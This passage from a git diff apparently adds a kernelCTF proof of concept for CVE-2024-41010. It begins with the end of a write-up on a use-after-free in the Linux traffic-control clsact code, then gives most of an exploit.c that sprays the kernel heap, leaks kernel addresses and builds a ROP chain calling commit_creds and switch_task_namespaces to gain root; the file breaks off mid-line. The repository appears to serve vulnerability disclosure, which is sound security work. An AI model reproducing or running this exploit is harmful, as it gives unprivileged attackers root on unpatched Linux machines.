+ +```c +static int +tcf_chain0_head_change_cb_add(struct tcf_block *block, + struct tcf_block_ext_info *ei, + struct netlink_ext_ack *extack) +{ + struct tcf_filter_chain_list_item *item; + struct tcf_chain *chain0; + + item = kmalloc(sizeof(*item), GFP_KERNEL); + if (!item) { + NL_SET_ERR_MSG(extack, "Memory allocation for head change callback item failed"); + return -ENOMEM; + } + item->chain_head_change = ei->chain_head_change; + item->chain_head_change_priv = ei->chain_head_change_priv; + + mutex_lock(&block->lock); + chain0 = block->chain0.chain; + if (chain0) + tcf_chain_hold(chain0); + else + list_add(&item->list, &block->chain0.filter_chain_list); + mutex_unlock(&block->lock); + + if (chain0) { + struct tcf_proto *tp_head; + + mutex_lock(&chain0->filter_chain_lock); + + tp_head = tcf_chain_dereference(chain0->filter_chain, chain0); + if (tp_head) + tcf_chain_head_change_item(item, tp_head); + + mutex_lock(&block->lock); + list_add(&item->list, &block->chain0.filter_chain_list); // <==[6] + mutex_unlock(&block->lock); + + mutex_unlock(&chain0->filter_chain_lock); + tcf_chain_put(chain0); + } + + return 0; +} +``` + +Finally, when the namespace to which the current network device belongs is closed, the `cleanup_net()` worker is called, resulting in a Use-After-Free condition. + +```c +cleanup_net() + => ops_exit_list() + => default_device_exit_batch() + => unregister_netdevice_many() + => unregister_netdevice_many_notify() + => dev_shutdown() + => qdisc_put() + => clsact_destroy() + => tcf_block_put_ext() + => tcf_chain0_head_change_cb_del() + => tcf_chain_head_change_item() + => clsact_chain_head_change() + => mini_qdisc_pair_swap() +``` + +The function where the Use-After-Free ultimately occurs is `mini_qdisc_pair_swap()`. This function retrieves `*miniqp->p_miniq` [7] and writes a value to `->rcu_state` [8]. Since `miniqp->p_miniq` is pointing to the already freed `&tcx_entry->miniq` [5], a UAF condition occurs. 
diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile new file mode 100644 index 00000000..99fa02e5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/Makefile @@ -0,0 +1,22 @@ +# define complier type +CC = gcc +# compile options setting +CFLAGS = -O2 -static -w +# library link & option setting +LDFLAGS = + +SUBDIRS = modules +clean_subdirs: + @for dir in $(SUBDIRS); do \ + $(MAKE) -C $$dir clean; \ + done + +exploit: exploit.c modules/helper.o modules/pipe.o modules/xattr.o modules/msg_msg.o + $(CC) $(CFLAGS) $^ -o $@ $(LIBS) $(INCLUDES) $(LDFLAGS) + +all: + $(MAKE) exploit + +clean: + $(MAKE) clean_subdirs + rm -f *.o exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit new file mode 100755 index 00000000..0f216475 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c new file mode 100644 index 00000000..6d209744 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c @@ -0,0 +1,871 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include + +#include "modules/pipe.h" +#include "modules/xattr.h" +#include "modules/helper.h" +#include "modules/msg_msg.h" + + +#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) +#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & 
~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) + +#ifndef NFT_CHAIN_BINDING +#define NFT_CHAIN_BINDING (1 << 2) +#endif + +#define FIRST_SPRAY_SZ 0x1d00 +#define SECOND_SPRAY_SZ (FIRST_SPRAY_SZ + 0x400) +#define THIRD_SPRAY_SZ (SECOND_SPRAY_SZ + 0x400) + +#define MTYPE_PRIMARY 0x41 + +#define CC_OVERFLOW_FACTOR 1 +#define OBJS_PER_SLAB 16 +#define CPU_PARTIAL (24 * 6) +#define OBJS_FRONT 48 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs_mountpoint" + +#define XATTR_FILE "/tmp/a" +#define XATTR_VALUE "value" + +#define XATTR_PADDING_STR "security.attr" +#define ATTRIBUTE_NAME_LEN 0x100 +#define VALUE_NAME_LEN 0x400 - 0x20 +#define HEAD_VALUE_NAME_LEN 0x100 +#define FILENAME_LEN 0x80 + +int spray_qids[0x1000]; + +uint64_t usleep_time = 5000000; +uint64_t prefix_spray_cnt = 0; +uint64_t ignore_xattr_idx[] = {-1, -1, -1, -1, -1, -1, -1, -1, -1, -1}; +struct pipeio *glb_pipes[0x600] = {0, }; + +int passer; +char *dupfile = NULL; +char *dupattr = NULL; + +uint64_t kbase = 0, kheap_leak = 0; + +void pre_make_mount_dir(char *fname) +{ + for(int i=0; i<0x8000; i++) + { + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, i); + + struct stat sb; + if(stat(mount_fldname, &sb)) + mkdir(mount_fldname, 0644); + } +} + +void mount_file(char *fname, int idx) +{ + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, idx); + if (mount("none", mount_fldname, "tmpfs", 0, NULL) < 0) { + fprintf(stderr, "mount %s(type: tmpfs): %s\n", mount_fldname, strerror(errno)); + printf("[-] cross cache: mount fail\n"); + } +} + +void umount_file(char *fname, int idx) +{ + char mount_fldname[0x100]; + snprintf(mount_fldname, 0x100, "%s-%05d", fname, idx); + if (umount(mount_fldname) < 0) { + fprintf(stderr, "umount %s(type: tmpfs): %s\n", mount_fldname, strerror(errno)); + printf("[-] cross cache: umount fail\n"); + } +} + +void cross_cache_spray1() +{ + for(int i=0; i VALUE_NAME_LEN) + { + printf("[+] 
overwrite success! let's leak (rcu_counter = %lx)\n", length); + dupfile = strdup(filename); + dupattr = strdup(attribute_name); + + return leak; + } + return NULL; +} + +void leak_xattr2(const char *filename, char *attribute_name) { + char *leak = (char *)calloc(sizeof(char), 0x10000); + int length = 0; + if((length = getxattr(filename, attribute_name, leak, 0x10000)) < 0) + panic("getxattr"); +} + +void spray_simple_xattr_for_leak_first(uint32_t cnt) { + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K]; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + cnt; i++) { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + + *(uint64_t *)value_name = i; + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_128+1, true); + + if(i % 0x10 == 0) + { + glb_pipes[(i - prefix_spray_cnt)/0x10] = create_pipeio(); + resize_pipe(glb_pipes[(i - prefix_spray_cnt)/0x10], PIPE_BUFFER_KMALLOC_CG_192); + activate_ops(glb_pipes[(i - prefix_spray_cnt)/0x10]); + } + } +} + +void spray_simple_xattr_for_leak_second(uint32_t cnt) { + + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + cnt; i++) { + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 3, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_2K, true); + + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 7, XATTR_PADDING_STR); + 
create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_2K, true); + } +} + +char *read_simple_xattr_for_leak(uint32_t idx) { + + char file_name[FILENAME_LEN]; + char attribute_name[ATTRIBUTE_NAME_LEN]; + + /* Need that the name is allocated within `kmalloc-256` */ + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, idx/3); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + return leak_kheap(file_name, attribute_name); +} + +void pre_make_xattr_file(const char *str, uint64_t last) +{ + int fd = creat(str, 0644); + if(fd < 0) + panic("creat"); + close(fd); + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + last; i++) { + char file_name[FILENAME_LEN]; + snprintf(file_name, FILENAME_LEN, "%s-%08d", str, i); + int fd = creat(file_name, 0644); + if(fd < 0) + panic("creat"); + close(fd); + } +} + +uint64_t info; +int sock1, sock2, sock3; + +void set_network() +{ + int res; + + mmap(0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); + + res = socket(0x10ul, 3, 0); + if (res != -1) + sock1 = res; + res = socket(0x10ul, 3, 0); + if (res != -1) + sock2 = res; + res = socket(0x10ul, 3ul, 0); + if (res != -1) + sock3 = res; + + *(uint64_t*)0x20000040 = 0; + *(uint32_t*)0x20000048 = 0; + *(uint64_t*)0x20000050 = 0x20000100; + *(uint64_t*)0x20000058 = 1; + *(uint64_t*)0x20000060 = 0; + *(uint64_t*)0x20000068 = 0; + *(uint32_t*)0x20000070 = 0; + + *(uint64_t*)0x20000100 = 0x20000240; + *(uint64_t*)0x20000108 = 0x24; + + *(uint32_t*)0x20000240 = 0x24; + *(uint16_t*)0x20000244 = 0x24; + *(uint16_t*)0x20000246 = 0; + *(uint32_t*)0x20000248 = 0; + *(uint32_t*)0x2000024c = 0; + + *(uint8_t*)0x20000250 = 0; + *(uint8_t*)0x20000251 = 0; + *(uint16_t*)0x20000252 = 0; + *(uint32_t*)0x20000254 = 0; + *(uint32_t*)0x20000258 = 0; + *(uint32_t*)0x2000025c = 0; + *(uint32_t*)0x20000260 = 0; + + sendmsg(sock3, 0x20000040ul, 0ul); + + *(uint32_t*)0x20000100 = 0x14; + res = getsockname(sock3, (struct sockaddr 
*)0x20000080ul, 0x20000100ul); + if (res != -1) + info = *(uint32_t*)0x20000084; + + *(uint64_t*)0x20000040 = 0; + *(uint32_t*)0x20000048 = 0; + *(uint64_t*)0x20000050 = 0x20000000; + *(uint64_t*)0x20000058 = 1; + *(uint64_t*)0x20000060 = 0; + *(uint64_t*)0x20000068 = 0; + *(uint32_t*)0x20000070 = 0; + + *(uint64_t*)0x20000000 = 0x200008c0; + *(uint64_t*)0x20000008 = 0x48; + + memcpy((void*)0x200008c0, "\x48\x00\x00\x00\x10\x00\x05\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90", 20); + *(uint32_t*)0x200008d4 = info; + memcpy((void*)0x200008d8, "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x12\x00\x0c\x00\x01\x00\x76\x65\x74\x68", 20); + + sendmsg(sock2, 0x20000040ul, 0ul); +} + +__attribute__((always_inline)) void qdisc_init() +{ + /* iovec */ + *(uint64_t*)0x300006c0 = 0; + *(uint32_t*)0x300006c8 = 0; + *(uint64_t*)0x300006d0 = 0x30000780; + *(uint64_t*)0x300006d8 = 1; + *(uint64_t*)0x300006e0 = 0; + *(uint64_t*)0x300006e8 = 0; + *(uint32_t*)0x300006f0 = 0; + + *(uint64_t*)0x30000780 = 0x30000480; + *(uint64_t*)0x30000788 = 0x54 + 0xc; + + + /* struct nlmsghdr */ + *(uint32_t*)0x30000480 = 0x54 + 0xc; // nlmsg_len + *(uint16_t*)0x30000484 = 0x24; // nlmsg_type + *(uint16_t*)0x30000486 = 0xf1d; // nlmsg_flags + *(uint32_t*)0x30000488 = 0; // nlmsg_seq + *(uint32_t*)0x3000048c = 0; // nlmsg_pid + + /* struct tcmsg */ + *(uint8_t*)0x30000490 = 0; + *(uint8_t*)0x30000491 = 0; + *(uint16_t*)0x30000492 = 0; + *(uint32_t*)0x30000494 = info; + *(uint16_t*)0x30000498 = 0; + *(uint16_t*)0x3000049a = 0; + *(uint16_t*)0x3000049c = 0xfff1; + *(uint16_t*)0x3000049e = -1; + *(uint16_t*)0x300004a0 = 0; + *(uint16_t*)0x300004a2 = 0; + + /* struct nlattr */ + *(uint16_t*)0x300004a4 = 0xb; + *(uint16_t*)0x300004a6 = 1; // TCA_KIND + /* payload */ + memcpy((void*)0x300004a8, "ingress\000", 8); + /* struct nlattr */ + *(uint16_t*)0x300004b0 = 0x24; + STORE_BY_BITMASK(uint16_t, , 0x300004b2, 8, 0, 14); + STORE_BY_BITMASK(uint16_t, , 0x300004b3, 0, 6, 1); + STORE_BY_BITMASK(uint16_t, 
, 0x300004b3, 1, 7, 1); + *(uint16_t*)0x300004b4 = 0x1c; + *(uint16_t*)0x300004b6 = 1; + *(uint8_t*)0x300004b8 = 0; + *(uint8_t*)0x300004b9 = 0; + *(uint16_t*)0x300004ba = 0; + *(uint32_t*)0x300004bc = 0; + *(uint32_t*)0x300004c0 = 0; + *(uint32_t*)0x300004c4 = 0; + *(uint32_t*)0x300004c8 = 0; + *(uint32_t*)0x300004cc = 0; + *(uint16_t*)0x300004d0 = 4; + *(uint16_t*)0x300004d2 = 2; + /* struct nlattr */ + *(uint16_t*)0x300004d4= 0xc; // nla_len + *(uint16_t*)0x300004d6 = 13; // nla_type + /* payload */ + *(uint64_t*)0x300004d8 = 1; +} + +__attribute__((always_inline)) void qdisc_set(char *kind) +{ + strcpy((void*)0x300004a8, kind); + syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul); +} + +__attribute__((always_inline)) void chain0(void) +{ + *(uint64_t*)0x30010280 = 0; + *(uint32_t*)0x30010288 = 0; + *(uint64_t*)0x30010290 = 0x30010240; + *(uint64_t*)0x30010298 = 1; + *(uint64_t*)0x300102a0 = 0; + *(uint64_t*)0x300102a8 = 0; + *(uint32_t*)0x300102b0 = 0; + + *(uint64_t*)0x30010240 = 0x30010340; + *(uint64_t*)0x30010248 = 0x24; + + /* struct nlmsghdr */ + *(uint32_t*)0x30010340 = 0x24; // nlmsg_len + *(uint16_t*)0x30010344 = 100; // nlmsg_type + *(uint16_t*)0x30010346 = 0xf31; // nlmsg_flags + *(uint32_t*)0x30010348 = 0; // nlmsg_seq + *(uint32_t*)0x3001034c = 0; // nlmsg_pid + + /* struct tcmsg */ + *(uint8_t*)0x30010350 = 0; // tcm_family + *(uint8_t*)0x30010351 = 0; // tcm__pad1 + *(uint16_t*)0x30010352 = 0; // tcm__pad2 + *(uint32_t*)0x30010354 = 0xFFFFFFFF; // tcm_ifindex + *(uint16_t*)0x30010358 = 0; // tcm_handle + *(uint16_t*)0x3001035a = 0; + *(uint32_t*)0x3001035c = 1; // tcm_parent // tcm_block_index + *(uint16_t*)0x30010360 = 0; // tcm_info + *(uint16_t*)0x30010362 = 0; + + syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x30010280ul, /*f=*/0ul); +} + +void trigger_uaf_write(int pip1[], int pip2[], int affi) +{ + int fd; + uint64_t t[4] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff, 0x0}; + intptr_t ret = 0; + char 
step[10]; + + cpu_affinity(affi); + unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET); + + set_network(); + + syscall(__NR_mmap, /*addr=*/0x30000000ul, /*len=*/0x1000000ul, /*prot=*/7ul, /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul); + + ret = syscall(__NR_sendmsg, /*fd=*/sock1, /*msg=*/0x300006c0ul, /*f=*/0ul); + + qdisc_init(); + qdisc_set("ingress"); + + chain0(); + + qdisc_set("clsact"); + read(pip1[0], step, 10); + /* ------------- change to ingress (ctx alloc) ---- ------- */ + + cross_cache_spray1(); + + qdisc_set("ingress"); + + if(!passer) + { + syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); // kfree_rcu wait + usleep(usleep_time); + } + + cross_cache_spray2(); + cross_cache_remove_all_chunk(); + + + write(pip2[1], "step 2", 4); + /* ------------ uaf write ------------ */ + read(pip1[0], step, 10); + + _exit(0); +} + + +uint64_t *trigger_spray_chunks(int pip1[], int pip2[]) +{ + char step[10]; + + unshare_setup(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET); + spray_simple_xattr_for_leak_first(FIRST_SPRAY_SZ); + + /* ------------- --------------- */ + + write(pip1[1], "step 1", 4); + read(pip2[0], step, 10); + + spray_simple_xattr_for_leak_second(FIRST_SPRAY_SZ); + printf("[+] spray xattr, which would be overwriten\n"); + + /* -------------------- ------------------------- */ + + write(pip1[1], "step 3", 4); + + /* ---------------------- heap oob read ---------------------------------- */ + printf("[*] waiting for exit...\n"); + usleep(100000); + + uint64_t *leaks; + for(int i=0; i> 24) - 1) << 24); // memory_stats+352 + break; + } + } + + printf("[+] kbase: 0x%llx\n", kbase); + + return leaks; +} + +void set_simple_xattr_for_fake_rbtree_first(uint64_t fname_idx, uint64_t attr_name, uint64_t conn1, uint64_t conn2) +{ + char file_name[FILENAME_LEN]; + char value_name[VALUE_NAME_LEN]; + char attribute_name[ATTRIBUTE_NAME_LEN]; + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, 
"security.attr%26lu-%s", 5, XATTR_PADDING_STR); + remove_xattr(file_name, attribute_name, false); + + struct simple_xattr *new_xattr = fake_xattr(RB_RED, conn1, conn2, 0x0, attr_name + 0x28, 0x10, NULL, 0x0); + + memset(value_name, 0, VALUE_NAME_LEN); + memcpy(value_name + 0x40 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---180 -> 0x---100 (from 0xc0) + memcpy(value_name + 0x80 - sizeof(struct simple_xattr), (char *)new_xattr, 0x30); // if chunk is 0x---240 -> 0x---200 (from 0x180) + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } + + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, fname_idx); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 1, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + + for(int i=prefix_spray_cnt + SECOND_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 5, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } + + free(new_xattr); +} + +void spray_simple_xattr_for_fake_rbtree_second(uint64_t target) +{ + char file_name[ATTRIBUTE_NAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_32K*2]; + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + SECOND_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + char *attribute_name = gen_xattr_name(XATTR_PREFIX_SECURITY, "attr1"); + for(int i=0; i --------------- */ + write(pip1[1], "step 1", 4); + read(pip2[0], step, 10); + + 
spray_simple_xattr_for_fake_rbtree_second(target); + printf("[+] spray xattr, which would be overwriten\n"); + + /* -------------------- ------------------------- */ + write(pip1[1], "step 3", 4); + + /* ---------------------- heap oob read ---------------------------------- */ + printf("[*] waiting for exit...\n"); + usleep(100000); +} + +void spray_msgmsg_for_overwrite_pipe_buffer(uint64_t cnt, uint64_t fake_page, uint64_t fake_ops, uint64_t call_func_addr) { + char buffer[0x2000] = {0}; + + struct pipe_buffer *fake_pipebuf = fake_pipe_buffer(fake_page, 0x0, 0x0, fake_ops, 0x10, 0x40); + ((uint64_t *)buffer)[0] = call_func_addr; + memcpy(buffer + 0x20, fake_pipebuf, sizeof(struct pipe_buffer)); + + for (int i = 0; i < cnt; i++) { + int msqid = alloc_msg_queue(); + + spray_qids[i] = msqid; + insert_msg_msgseg(msqid, MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64, MSG_MSGSEG_KMALLOC_CG_64, buffer); + } +} + +uint64_t read_msgmsg_for_leak_vmemmap_base(uint64_t cnt) { + uint64_t vmemmap_base = 0; + + for(int i=0; i < cnt; i++) + { + char *buf = read_msg_msgseg(spray_qids[i], MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64); + + if( (((uint64_t *)(buf))[4] >> 48) == 0xffff) + { + vmemmap_base = ((uint64_t *)(buf))[4]; + break; + } + } + return vmemmap_base; +} + +void cleanup() +{ + char file_name[FILENAME_LEN]; + int fd = remove(XATTR_FILE); + if(fd < 0) + panic("remove"); + + for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + int fd = remove(file_name); + if(fd < 0) + panic("remove"); + + } +} + +void cleanup2(int except) +{ + if(prefix_spray_cnt == 0) + prefix_spray_cnt += THIRD_SPRAY_SZ; + else + prefix_spray_cnt += THIRD_SPRAY_SZ - FIRST_SPRAY_SZ; +} + +void cleanup_cg_192() +{ + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + + for (uint64_t i = 0x1000; i < FIRST_SPRAY_SZ; i++) { + 
snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 9, XATTR_PADDING_STR); + create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true); + } +} + +int run(void) +{ + pid_t pid; + int pip1[2], pip2[2], pip3[2]; + char step[10]; + uint64_t handle_num; + int p1; + int status1; + pthread_t hdr1; + + passer = 0; + + struct regs *sr = save_state(); + + pipe(pip1); + pipe(pip2); + pipe(pip3); + + if(!fork()) + exit(0); + + cpu_affinity(0); + pre_make_mount_dir(TMPFS_MOUNT_POINT); + pre_make_xattr_file(XATTR_FILE, 0x10000); + + if (!fork()) + trigger_uaf_write(pip1, pip2, 0); + + uint64_t *leaks = trigger_spray_chunks(pip1, pip2); + + for(int i=0; i<0x500; i++) + release_pipe(glb_pipes[i]); + + if (!leaks) + { + printf("[-] fail on get xattr node info, cleanup it\n"); + cleanup(); + return -1; + } + + uint64_t lnode = 0, rnode = 0, attr_name_ptr = 0; + + typedef struct { + struct simple_xattr xattr; + int fname_idx; + } xattr_node_leak; + + xattr_node_leak nodes[0x4000/(0x40/0x8)]; + int nodes_cnt = 0, nodes_front = 0; + for(int i=0; i < 0x4000/(0x40/0x8); i+=0x40/0x8) + { + if(leaks[0x17 + i] == 0x59 && leaks[0x14 + i] && leaks[0x15 + i] && leaks[0x16 + i] && leaks[0x18 + i]) + { + nodes[nodes_cnt].xattr.rb_node.rb_right = leaks[0x14 + i]; + nodes[nodes_cnt].xattr.rb_node.rb_left = leaks[0x15 + i]; + nodes[nodes_cnt].xattr.name = leaks[0x16 + i]; + nodes[nodes_cnt].fname_idx = leaks[0x18 + i]; + nodes_cnt++; + } + } + + printf("[*] total leak cnts: %d\n", nodes_cnt); + + if(nodes_cnt < 5) + { + printf("[-] fail on get enough xattr node info, cleanup it\n"); + cleanup(); + return -1; + } + if(kbase == 0) + { + printf("[-] fail on get kbase, cleanup it\n"); + cleanup(); + return -1; + } + + printf("[+] success, leak xattr and kbase\n"); + + cleanup_cg_192(); + + passer = 1; + 
+retry_1bit_off: + if (!fork()) + trigger_uaf_write(pip1, pip2, 0); + + generate_fake_rbtree(pip1, pip2, (uint64_t)nodes[nodes_front].fname_idx, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_right + 1, + (uint64_t)nodes[nodes_front].xattr.name, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left, + (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left - 0x18); + + char file_name[FILENAME_LEN]; + char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, }; + char attribute_name[XATTR_VALUE_KMALLOC_CG_8K]; + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, nodes[nodes_front].fname_idx); + + printf("[*] try to remove fake xattr\n"); + if(remove_xattr(file_name, "security.attr", false) < 0) + { + printf("[-] fail on remove_xattr, cleanup it\n"); + cleanup2(nodes[nodes_front].fname_idx); + nodes_front++; + passer = 0; + goto retry_1bit_off; + } + + struct pipeio *pipes[0x1f8]; + for(int i=0; i<0x1f8; i++) + { + pipes[i] = create_pipeio(); + resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64); + } + + printf("[+] pipe alloc fin\n"); + + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 1); + remove_xattr_noerror(file_name, attribute_name); + + for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) + { + snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i); + snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 5); + remove_xattr_noerror(file_name, attribute_name); + } + + spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0); + + for(int i=0; i<0x1f8; i++) + activate_ops(pipes[i]); + + uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28; + uint64_t kheap_base = (((((uint64_t)nodes[nodes_front].xattr.rb_node.rb_right - 0x6000000) >> 28) - 0x10) << 28); + uint64_t longjump_victim_address = kbase + 0x2c51a40; + + printf("[*] page_offset_base: 0x%llx\n", kheap_base); + printf("[*] vmemmap base: 0x%llx\n", vmemmap_base); + printf("[*] longjump victim address: 0x%llx\n", 
longjump_victim_address); + if(vmemmap_base == 0) + { + printf("[-] fail on get vmemmap_base, cleanup it"); + cleanup(); + return -1; + } + + uint64_t wakeup_long64 = kbase + 0x12c291; + + printf("[*] spray msg_msg again\n"); + spray_msgmsg_for_overwrite_pipe_buffer(0x300, + virt2page(longjump_victim_address & (~0xfff), kheap_base, vmemmap_base), + nodes[nodes_front].xattr.name, wakeup_long64 + ); + + uint64_t init_cred = kbase + 0x2c72d60; + uint64_t commit_cred = kbase + 0x001f5520; + uint64_t prepare_kernel_cred = kbase + 0x001f57d0; + uint64_t ret_from_fork = kbase + 0x10d430; + uint64_t msleep = kbase + 0x271300; + + uint64_t find_task_by_vpid = kbase + 0x1e8d60; + uint64_t switch_task_namespaces = kbase + 0x1f31c0; + uint64_t set_memory_x = kbase + 0x001551f0; + + uint64_t init_nsproxy = kbase + 0x2c72880; + + uint64_t ret = kbase + 0x5a1; + + // wakeup_long64 + uint64_t longjump[] = { + 0x0, // rbp + 0x1, // rsi + longjump_victim_address & (~0xfff), // rdi + 0x0, // rbx + ret, // rip -> ret + longjump_victim_address + 0x8*6, // rsp -> stack pivot to longjump victim address + + set_memory_x, + + longjump_victim_address + 0x8*0x18, // pop rdi; ret; + init_cred, + commit_cred, // commit_cred(init_cred); + + longjump_victim_address + 0x8*0x18, // pop rdi; ret; + 1, + find_task_by_vpid, // find_task_by_vpid(1) + + longjump_victim_address + 0x8*0x1a, // mov rdi, rax; ret; + + longjump_victim_address + 0x8*0x19, // pop rsi; ret; + init_nsproxy, + switch_task_namespaces, // switch_task_namespaces(task, init_nsproxy) + + longjump_victim_address + 0x8*0x1b, // swapgs; iretq; + 0x0, + sr->cs, + sr->rflags, + sr->rsp, + sr->ss, + 0x0, // 23 + + 0xc35f, // pop rdi; ret -> idx: 0x18 + 0xc35e, // pop rsi; ret + 0xc3c78948, // mov rdi, rax; ret + 0xcf48f8010f, // swapgs; iretq; + }; + + printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name); + + for(int i=0; i<0x1f8; i++) + write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), + 
